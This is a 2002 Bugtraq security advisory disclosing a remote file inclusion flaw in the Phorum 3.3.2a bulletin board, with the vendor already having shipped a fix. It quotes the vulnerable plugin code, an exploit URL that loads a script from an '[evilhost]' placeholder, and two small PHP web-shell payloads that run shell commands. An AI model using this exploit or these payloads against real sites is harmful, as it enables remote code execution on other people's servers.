[25490] in bugtraq
Phorum 3.3.2a remote command execution
daemon@ATHENA.MIT.EDU (Markus Arndt)
Fri May 17 19:17:38 2002
Date: Fri, 17 May 2002 20:26:40 +0200
Message-Id: <200205171826.g4HIQeX02194@mailgate5.cinetic.de>
MIME-Version: 1.0
From: Markus Arndt <markus-arndt@web.de>
To: bugtraq@securityfocus.com
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Target:
Phorum 3.3.2a (prior versions?)
Description:
In Phorum 3.3.2a (a bulletin board) there's a security flaw that lets remote users
include external php scripts and execute arbitary code.
Found by:
Markus Arndt<markus-arndt@web.de>
Vendor:
http://www.phorum.org
Notified Vendor:
Yes, already fixed version available
Details:
After extracting the Phorum 3.3.2a archive we have lots of php files and subfolders.
I just snooped around a bit and found this file vulnerable for remote script inclusion:
./plugin/replace/plugin.php
let's see some code:
<?php
include("$PHORUM[settings_dir]/replace.php");
function mod_replace_read_body ($body) {
global $pluginreplace;
reset($pluginreplace);
while(list($key,$val) = each($pluginreplace)) {
$body = str_replace($key,$val,$body);
}
return $body;
}
$plugins["read_body"]["mod_replace"]="mod_replace_read_body";
?>
Easy one..
http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls
This one will get the file http://[evilhost]/replace.php and execute it.
If [evilhost] has php enabled we could use this one as replace.php:
<?
echo("<?
system(\"\$cmd\");
?>");
?>
If it's not php-enabled simply:
<?
system("$cmd");
?>
Markus Arndt<markus-arndt@web.de>
http://skka.de
________________________________________________________________
Keine verlorenen Lotto-Quittungen, keine vergessenen Gewinne mehr!
Beim WEB.DE Lottoservice: http://tippen2.web.de/?x=13
